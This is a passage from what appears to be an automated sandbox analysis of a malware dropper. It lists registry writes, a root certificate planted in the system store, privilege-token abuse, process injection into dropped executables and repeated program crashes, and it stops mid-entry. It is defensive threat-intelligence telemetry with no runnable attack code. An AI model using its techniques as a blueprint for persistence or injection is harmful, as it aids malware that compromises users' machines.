Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	Graphics.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

File.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	File.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	File.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3644 PING.EXE

pid	process
3644	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exe

pid	process
3152	pub2.exe
3152	pub2.exe
4300	jfiag3g_gg.exe
4300	jfiag3g_gg.exe
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488
2488

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2488
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

pub2.exeGwO_2OM7gbGEaJk9mFQFWpc1.exe

pid process

3152 pub2.exe
116 GwO_2OM7gbGEaJk9mFQFWpc1.exe

pid	process
2488

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Install.exeSoCleanInst.exetaskkill.exemd9_1sjm.exe

description	pid	process
Token: SeCreateTokenPrivilege	3964	Install.exe
Token: SeAssignPrimaryTokenPrivilege	3964	Install.exe
Token: SeLockMemoryPrivilege	3964	Install.exe
Token: SeIncreaseQuotaPrivilege	3964	Install.exe
Token: SeMachineAccountPrivilege	3964	Install.exe
Token: SeTcbPrivilege	3964	Install.exe
Token: SeSecurityPrivilege	3964	Install.exe
Token: SeTakeOwnershipPrivilege	3964	Install.exe
Token: SeLoadDriverPrivilege	3964	Install.exe
Token: SeSystemProfilePrivilege	3964	Install.exe
Token: SeSystemtimePrivilege	3964	Install.exe
Token: SeProfSingleProcessPrivilege	3964	Install.exe
Token: SeIncBasePriorityPrivilege	3964	Install.exe
Token: SeCreatePagefilePrivilege	3964	Install.exe
Token: SeCreatePermanentPrivilege	3964	Install.exe
Token: SeBackupPrivilege	3964	Install.exe
Token: SeRestorePrivilege	3964	Install.exe
Token: SeShutdownPrivilege	3964	Install.exe
Token: SeDebugPrivilege	3964	Install.exe
Token: SeAuditPrivilege	3964	Install.exe
Token: SeSystemEnvironmentPrivilege	3964	Install.exe
Token: SeChangeNotifyPrivilege	3964	Install.exe
Token: SeRemoteShutdownPrivilege	3964	Install.exe
Token: SeUndockPrivilege	3964	Install.exe
Token: SeSyncAgentPrivilege	3964	Install.exe
Token: SeEnableDelegationPrivilege	3964	Install.exe
Token: SeManageVolumePrivilege	3964	Install.exe
Token: SeImpersonatePrivilege	3964	Install.exe
Token: SeCreateGlobalPrivilege	3964	Install.exe
Token: 31	3964	Install.exe
Token: 32	3964	Install.exe
Token: 33	3964	Install.exe
Token: 34	3964	Install.exe
Token: 35	3964	Install.exe
Token: SeDebugPrivilege	1656	SoCleanInst.exe
Token: SeDebugPrivilege	4988	taskkill.exe
Token: SeManageVolumePrivilege	748	md9_1sjm.exe
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeManageVolumePrivilege	748	md9_1sjm.exe
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488
Token: SeShutdownPrivilege	2488
Token: SeCreatePagefilePrivilege	2488

Suspicious use of SetWindowsHookEx 27 IoCs

Processes:

rlX816mGw7kZIFzacSmBmJ7e.exerH8MYFkGOLLATkR32GhOKCql.exegzS6rbGPU1EZPQTUVLMrn7q5.exeKiKAQzH09soNbMxVpQFOq7RX.exeGwO_2OM7gbGEaJk9mFQFWpc1.exe_KEy8rORV47kA2jvlkhTj5sm.exerKvFY6CnHWie444hMUObNLtV.exeSFjFVmkKnSoShKKFwn566opt.exeJaDEtlapSjxxI_ZqyH4MFcfS.exeixZcamiQqZPrcGOTEY9nRZ0R.exeO2FQ_zwITlykcrCcg9eOnm_b.exeeXbyB37rZ0OaYLSf9eU33wGD.execcl7mJzQxh24f91pr8C8K0zf.exepkw4sC1xj9comutOSMhYswPi.exen_fNQt5nNovTFAQa682C7pDy.exei80S_6Pl5Xx0wyEndZkCZyhk.exerKvFY6CnHWie444hMUObNLtV.tmpd9H1uWQsKmp1oDDDLkKcqRF1.exeX6GTYiWjljlO4KO4OWfN7Ht5.exengrb4QAhKGaZvpKVZrEs7TAt.exeCUiVm5CZ74ksoLUi1daJiVmQ.exemFY23IUwQNj7co79jeBsFtUh.exeVvt51hX9LGs41wRt6jjl79A9.exemFY23IUwQNj7co79jeBsFtUh.tmp_j715KV6HxAdfmV1xLwXzyuT.exeO2FQ_zwITlykcrCcg9eOnm_b.exeInstall.exe

pid	process
5100	rlX816mGw7kZIFzacSmBmJ7e.exe
3496	rH8MYFkGOLLATkR32GhOKCql.exe
5012	gzS6rbGPU1EZPQTUVLMrn7q5.exe
4176	KiKAQzH09soNbMxVpQFOq7RX.exe
2588	GwO_2OM7gbGEaJk9mFQFWpc1.exe
4408	_KEy8rORV47kA2jvlkhTj5sm.exe
4168	rKvFY6CnHWie444hMUObNLtV.exe
2244	SFjFVmkKnSoShKKFwn566opt.exe
4840	JaDEtlapSjxxI_ZqyH4MFcfS.exe
2804	ixZcamiQqZPrcGOTEY9nRZ0R.exe
1472	O2FQ_zwITlykcrCcg9eOnm_b.exe
2352	eXbyB37rZ0OaYLSf9eU33wGD.exe
1992	ccl7mJzQxh24f91pr8C8K0zf.exe
2400	pkw4sC1xj9comutOSMhYswPi.exe
3492	n_fNQt5nNovTFAQa682C7pDy.exe
2548	i80S_6Pl5Xx0wyEndZkCZyhk.exe
1624	rKvFY6CnHWie444hMUObNLtV.tmp
4180	d9H1uWQsKmp1oDDDLkKcqRF1.exe
5008	X6GTYiWjljlO4KO4OWfN7Ht5.exe
2260	ngrb4QAhKGaZvpKVZrEs7TAt.exe
1456	CUiVm5CZ74ksoLUi1daJiVmQ.exe
5452	mFY23IUwQNj7co79jeBsFtUh.exe
2240	Vvt51hX9LGs41wRt6jjl79A9.exe
5672	mFY23IUwQNj7co79jeBsFtUh.tmp
5636	_j715KV6HxAdfmV1xLwXzyuT.exe
5852	O2FQ_zwITlykcrCcg9eOnm_b.exe
5892	Install.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exeFiles.exeInstall.execmd.exesvchost.exeGraphics.execmd.exeWerFault.exeFile.exe

description	pid	process	target process
PID 3908 wrote to memory of 1656	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	SoCleanInst.exe
PID 3908 wrote to memory of 1656	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	SoCleanInst.exe
PID 3908 wrote to memory of 748	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	md9_1sjm.exe
PID 3908 wrote to memory of 748	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	md9_1sjm.exe
PID 3908 wrote to memory of 748	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	md9_1sjm.exe
PID 3908 wrote to memory of 4332	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Folder.exe
PID 3908 wrote to memory of 4332	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Folder.exe
PID 3908 wrote to memory of 4332	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Folder.exe
PID 3908 wrote to memory of 1536	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Graphics.exe
PID 3908 wrote to memory of 1536	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Graphics.exe
PID 3908 wrote to memory of 1536	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Graphics.exe
PID 3908 wrote to memory of 1776	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Updbdate.exe
PID 3908 wrote to memory of 1776	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Updbdate.exe
PID 3908 wrote to memory of 1776	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Updbdate.exe
PID 3908 wrote to memory of 3964	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Install.exe
PID 3908 wrote to memory of 3964	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Install.exe
PID 3908 wrote to memory of 3964	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Install.exe
PID 3908 wrote to memory of 3024	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Files.exe
PID 3908 wrote to memory of 3024	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Files.exe
PID 3908 wrote to memory of 3024	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	Files.exe
PID 3908 wrote to memory of 3152	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	pub2.exe
PID 3908 wrote to memory of 3152	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	pub2.exe
PID 3908 wrote to memory of 3152	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	pub2.exe
PID 3908 wrote to memory of 3644	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	File.exe
PID 3908 wrote to memory of 3644	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	File.exe
PID 3908 wrote to memory of 3644	3908	01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe	File.exe
PID 3024 wrote to memory of 4864	3024	Files.exe	jfiag3g_gg.exe
PID 3024 wrote to memory of 4864	3024	Files.exe	jfiag3g_gg.exe
PID 3024 wrote to memory of 4864	3024	Files.exe	jfiag3g_gg.exe
PID 3964 wrote to memory of 4320	3964	Install.exe	cmd.exe
PID 3964 wrote to memory of 4320	3964	Install.exe	cmd.exe
PID 3964 wrote to memory of 4320	3964	Install.exe	cmd.exe
PID 4320 wrote to memory of 4988	4320	cmd.exe	taskkill.exe
PID 4320 wrote to memory of 4988	4320	cmd.exe	taskkill.exe
PID 4320 wrote to memory of 4988	4320	cmd.exe	taskkill.exe
PID 3024 wrote to memory of 4300	3024	Files.exe	jfiag3g_gg.exe
PID 3024 wrote to memory of 4300	3024	Files.exe	jfiag3g_gg.exe
PID 3024 wrote to memory of 4300	3024	Files.exe	jfiag3g_gg.exe
PID 1520 wrote to memory of 3976	1520	svchost.exe	Graphics.exe
PID 1520 wrote to memory of 3976	1520	svchost.exe	Graphics.exe
PID 1520 wrote to memory of 3976	1520	svchost.exe	Graphics.exe
PID 3976 wrote to memory of 2192	3976	Graphics.exe	cmd.exe
PID 3976 wrote to memory of 2192	3976	Graphics.exe	cmd.exe
PID 2192 wrote to memory of 3064	2192	cmd.exe	netsh.exe
PID 2192 wrote to memory of 3064	2192	cmd.exe	netsh.exe
PID 3976 wrote to memory of 4820	3976	Graphics.exe	csrss.exe
PID 3976 wrote to memory of 4820	3976	Graphics.exe	csrss.exe
PID 3976 wrote to memory of 4820	3976	Graphics.exe	csrss.exe
PID 1520 wrote to memory of 1968	1520	svchost.exe	schtasks.exe
PID 1520 wrote to memory of 1968	1520	svchost.exe	schtasks.exe
PID 2404 wrote to memory of 748	2404	WerFault.exe	md9_1sjm.exe
PID 2404 wrote to memory of 748	2404	WerFault.exe	md9_1sjm.exe
PID 3644 wrote to memory of 908	3644	File.exe	W1_pEOkwX0ho7sTdp8HsZAP2.exe
PID 3644 wrote to memory of 908	3644	File.exe	W1_pEOkwX0ho7sTdp8HsZAP2.exe
PID 3644 wrote to memory of 5100	3644	File.exe	rlX816mGw7kZIFzacSmBmJ7e.exe
PID 3644 wrote to memory of 5100	3644	File.exe	rlX816mGw7kZIFzacSmBmJ7e.exe
PID 3644 wrote to memory of 5100	3644	File.exe	rlX816mGw7kZIFzacSmBmJ7e.exe
PID 3644 wrote to memory of 5012	3644	File.exe	gzS6rbGPU1EZPQTUVLMrn7q5.exe
PID 3644 wrote to memory of 5012	3644	File.exe	gzS6rbGPU1EZPQTUVLMrn7q5.exe
PID 3644 wrote to memory of 5012	3644	File.exe	gzS6rbGPU1EZPQTUVLMrn7q5.exe
PID 3644 wrote to memory of 3496	3644	File.exe	rH8MYFkGOLLATkR32GhOKCql.exe
PID 3644 wrote to memory of 3496	3644	File.exe	rH8MYFkGOLLATkR32GhOKCql.exe
PID 3644 wrote to memory of 3496	3644	File.exe	rH8MYFkGOLLATkR32GhOKCql.exe
PID 3644 wrote to memory of 4176	3644	File.exe	KiKAQzH09soNbMxVpQFOq7RX.exe

C:\Users\Admin\AppData\Local\Temp\01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe
"C:\Users\Admin\AppData\Local\Temp\01fbd3a5bc12c7ffb70db17a1b4d672cdeeffc2816ed9cc8bb854dc75e2459f2.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3908

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 3496
3⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1992

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:4332

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
PID:1536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 288
3⤵
- Program crash
PID:2640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 292
3⤵
- Program crash
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 292
3⤵
- Program crash
PID:3680

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 596
3⤵
- Program crash
PID:936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 696
3⤵
- Program crash
PID:4828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 696
3⤵
- Program crash
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 736
3⤵
- Program crash
PID:4188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 696
3⤵
- Program crash
PID:2300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 740
3⤵
- Program crash
PID:804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 800
3⤵
- Program crash
PID:2348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 728
3⤵
- Program crash
PID:1616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 720
3⤵
- Program crash
PID:1592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 728
3⤵
- Program crash
PID:3908

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 888
3⤵
- Program crash
PID:4452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 760
3⤵
- Program crash
PID:4124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 944
3⤵
- Program crash
PID:3720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 828
3⤵
- Program crash
PID:1348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 732
3⤵
- Program crash
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 732
3⤵
- Program crash
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 888
3⤵
- Program crash
PID:960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 984
3⤵
- Program crash
PID:1276

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 292
4⤵
- Program crash
PID:3540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 296
4⤵
- Program crash
PID:1968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 296
4⤵
- Program crash
PID:3932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 576
4⤵
- Program crash
PID:2980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 668
4⤵
- Program crash
PID:840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 668
4⤵
- Program crash
PID:4124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 688
4⤵
- Program crash
PID:3824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 696
4⤵
- Program crash
PID:532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 732
4⤵
- Program crash
PID:1656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 628
4⤵
- Program crash
PID:3640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 752
4⤵
- Program crash
PID:2992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 748
4⤵
- Program crash
PID:3964

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 832
4⤵
- Program crash
PID:756

C:\Windows\SysWOW64\WerFault.exe
